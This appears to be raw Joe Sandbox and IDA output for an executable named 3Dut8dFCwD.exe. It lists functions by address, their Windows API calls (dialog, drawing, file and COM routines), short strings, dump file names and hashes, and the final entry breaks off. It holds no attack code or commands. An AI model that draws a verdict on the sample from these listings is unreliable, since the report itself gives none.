MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C07

Part of subcall function 00404D60: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
Part of subcall function 00404D60: wsprintfW.USER32 ref: 00404E0A
Part of subcall function 00404D60: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D

Strings

A, xrefs: 00404AC7

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 426e44edd7368518c1c7f183de8445ff04209b3407d9146befa81bf80a1aac5c
Instruction ID: a16cb653eec2d326bc9532795c0b3c746b0ee9de9a15b8a8e70a0412fee6ffe7
Opcode Fuzzy Hash: 426e44edd7368518c1c7f183de8445ff04209b3407d9146befa81bf80a1aac5c
Instruction Fuzzy Hash: F3A194B1900208ABDB119FA6DD85BAF77B8EF84314F11803BF601B62D1D77C9A418B69

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Local\Temp\nsm4D39.tmp, xrefs: 0040226E

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp
API String ID: 542301482-1064468493
Opcode ID: dc1c51b489d66c3ae56a3330a78418c281c6f978a235157eafada417e1326d44
Instruction ID: ec9576eb85d19529fc8e70744cd4d9d757721a0e149670041693576dbfb17bce
Opcode Fuzzy Hash: dc1c51b489d66c3ae56a3330a78418c281c6f978a235157eafada417e1326d44
Instruction Fuzzy Hash: 82410575A00209AFCB40DFE4C989EAD7BB5FF48308B20456EF505EB2D1DB799982CB54

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
Instruction ID: a3e640cb8dc0d2d7f963ac08cc51882bce801df3f972718032989310b2356a06
Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
Instruction Fuzzy Hash: 82F05E71904104AAD701EBA4EA499AEB378EF14314F60457BE102F21E0DBB849119B1A

Function 00404F20 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F38
GetDlgItem.USER32(?,00000408), ref: 00404F43
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F8D
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FA4
SetWindowLongW.USER32(?,000000FC,0040552D), ref: 00404FBD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FD1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FE3
SendMessageW.USER32(?,00001109,00000002), ref: 00404FF9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405017
DeleteObject.GDI32(00000000), ref: 0040501A
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405045
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405051
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050EC
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040511C

Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405130
GetWindowLongW.USER32(?,000000F0), ref: 0040515E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040516C
ShowWindow.USER32(?,00000005), ref: 0040517C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405277
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052DC
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052F1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405315
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405335
ImageList_Destroy.COMCTL32(?), ref: 0040534A
GlobalFree.KERNEL32(?), ref: 0040535A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053D3
SendMessageW.USER32(?,00001102,?,?), ref: 0040547C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040548B
InvalidateRect.USER32(?,00000000,00000001), ref: 004054B6
ShowWindow.USER32(?,00000000), ref: 00405504
GetDlgItem.USER32(?,000003FE), ref: 0040550F
ShowWindow.USER32(00000000), ref: 00405516

Strings

, xrefs: 004054EE
N, xrefs: 004051B5
M, xrefs: 004050D4

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
Instruction ID: 407b5383e9f0600e1b6d0dc6c9775fd3f0ad17fb7be6f4e7eeeed7564f32b1fa
Opcode Fuzzy Hash: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
Instruction Fuzzy Hash: F0028A70900608AFDF20DF65DD85AAF7BB5FB85314F10816AF610BA2E1D7798A41CF58

Function 00403FB4 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF0
ShowWindow.USER32(?), ref: 00404010
GetWindowLongW.USER32(?,000000F0), ref: 00404022
ShowWindow.USER32(?,00000004), ref: 0040403B
DestroyWindow.USER32 ref: 0040404F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00404068
GetDlgItem.USER32(?,?), ref: 00404087
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040409B
IsWindowEnabled.USER32(00000000), ref: 004040A2
GetDlgItem.USER32(?,00000001), ref: 0040414D
GetDlgItem.USER32(?,00000002), ref: 00404157
SetClassLongW.USER32(?,000000F2,?), ref: 00404171
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041C2
GetDlgItem.USER32(?,00000003), ref: 00404268
ShowWindow.USER32(00000000,?), ref: 00404289
EnableWindow.USER32(?,?), ref: 0040429B
EnableWindow.USER32(?,?), ref: 004042B6
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042CC
EnableMenuItem.USER32(00000000), ref: 004042D3
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042EB
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042FE
lstrlenW.KERNEL32(007A1748,?,007A1748,00000000), ref: 00404328
SetWindowTextW.USER32(?,007A1748), ref: 0040433C
ShowWindow.USER32(?,0000000A), ref: 00404470

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
Instruction ID: c568fb1f9e303522a8696359bfc4ff9199fb68b2c3e72f23d40ed4e3cc12537a
Opcode Fuzzy Hash: b08647c02fb37b41973a387d7810d7f5d0e6d787a748a85b5b12ca029d29054f
Instruction Fuzzy Hash: D3C1C0B1500604ABDB206F61EE85E2A3A68FBD6759F00853EFA51B51F0CB3D5881DB2D

Function 00404672 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404710
GetDlgItem.USER32(?,000003E8), ref: 00404724
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404741
GetSysColor.USER32(?), ref: 00404752
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404760
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040476E
lstrlenW.KERNEL32(?), ref: 00404773
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404780
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404795
GetDlgItem.USER32(?,0000040A), ref: 004047EE
SendMessageW.USER32(00000000), ref: 004047F5
GetDlgItem.USER32(?,000003E8), ref: 00404820
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404863
LoadCursorW.USER32(00000000,00007F02), ref: 00404871
SetCursor.USER32(00000000), ref: 00404874
LoadCursorW.USER32(00000000,00007F00), ref: 0040488D
SetCursor.USER32(00000000), ref: 00404890
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048BF
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048D1

Strings

E@, xrefs: 0040487C
N, xrefs: 0040480E

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$E@
API String ID: 3103080414-3433303851
Opcode ID: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
Instruction ID: bdd40037bb0d452aa3b0c6711a4aa3bdd99b9424e38a8cf4b21d92dd7aac4ea1
Opcode Fuzzy Hash: 222016cd200aa2e6cb1c1b10df294e93f696a380f153465af12d712dc680f444
Instruction Fuzzy Hash: CB61C2B5900609BFDB10AF61DD85A6A7B69FB84304F00843AF701B62D0C77C9D61DF99

Function 0040617A Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE

Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
Part of subcall function 00405F89: lstrlenA.KERNEL32(00000000,?,00000000,0040626E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB

GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
wsprintfA.USER32 ref: 004061F9
GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
GlobalFree.KERNEL32(00000000), ref: 004062E2
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062E9

Part of subcall function 00406024: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\3Dut8dFCwD.exe,80000000,00000003), ref: 00406028
Part of subcall function 00406024: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A

Strings

Uz, xrefs: 004061D0
[Rename], xrefs: 00406263, 00406275
%ls=%ls, xrefs: 004061EF
Mz, xrefs: 004061A3
Uz, xrefs: 004061D7

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Mz$Uz$Uz
API String ID: 2171350718-3350566011
Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction ID: 1eba4fe57778a2caeea4241fd1a0165fec623ab6fc85672a9c0ceb4c44b2574e
Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction Fuzzy Hash: CC312470600715BBD2207B619D49F6B3B5CDF82744F16017EFA02B62C2EA7DD820867D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
Instruction ID: f4bc5d4286e22692ddece56c15c19c5fca937d6aefcb7484b61e28148d91a738
Opcode Fuzzy Hash: 0065e8d55c47ea3cbcda8c109104f1eee6ee8d4d6af800c5cfa02106002edbf4
Instruction Fuzzy Hash: 3F418A71804209AFCF058FA5CE459BFBBB9FF45314F00802EF591AA1A0CB389A55DFA4

Function 00406571 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(007A6200,00000400), ref: 00406693
GetWindowsDirectoryW.KERNEL32(007A6200,00000400,00000000,007A0728,?,?,00000000,00000000,00798F00,759223A0), ref: 004066A9
SHGetPathFromIDListW.SHELL32(00000000,007A6200), ref: 00406707
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406710
lstrcatW.KERNEL32(007A6200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040673B
lstrlenW.KERNEL32(007A6200,00000000,007A0728,?,?,00000000,00000000,00798F00,759223A0), ref: 00406795

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406664
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406735

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction ID: 3bd779c8658dd38474262f04f34df11dc98fe6ff926310c24388666a45315c92
Opcode Fuzzy Hash: fb78c655de7e04e2c0873077e29524e20483bf8d3f5bca8374ab451ad378ea15
Instruction Fuzzy Hash: 4C6123716046019BD720AF24DD80B6A77E8AB95318F25063FF687B33D1DA3C8961875E

Function 0040451A Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404537
GetSysColor.USER32(00000000), ref: 00404575
SetTextColor.GDI32(?,00000000), ref: 00404581
SetBkMode.GDI32(?,?), ref: 0040458D
GetSysColor.USER32(?), ref: 004045A0
SetBkColor.GDI32(?,?), ref: 004045B0
DeleteObject.GDI32(?), ref: 004045CA
CreateBrushIndirect.GDI32(?), ref: 004045D4

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: fafa423c3d5d8bdb364a41ac4aaa45114b780d6afda8d36e4a103189301150f1
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 242153B1500704ABCB359F39DD08A5B7BF8BF41714F14892EEB96A22E0D738E944CB54

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406105: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D6,00000000,00000000,?,00000000,00000011), ref: 0040611B

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 00000000.00000002.2215265119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2215211662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215333188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2215426032.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2217425069.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3Dut8dFCwD.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 20294edbd6775d22b81a0ff36bbb0989563b2d3368df465689f6e0dcb3bf3618
Instruction ID: ad829204a8421b16aaf2dc4ab9086753538d66bd122375994c0f550e7c4a5b44
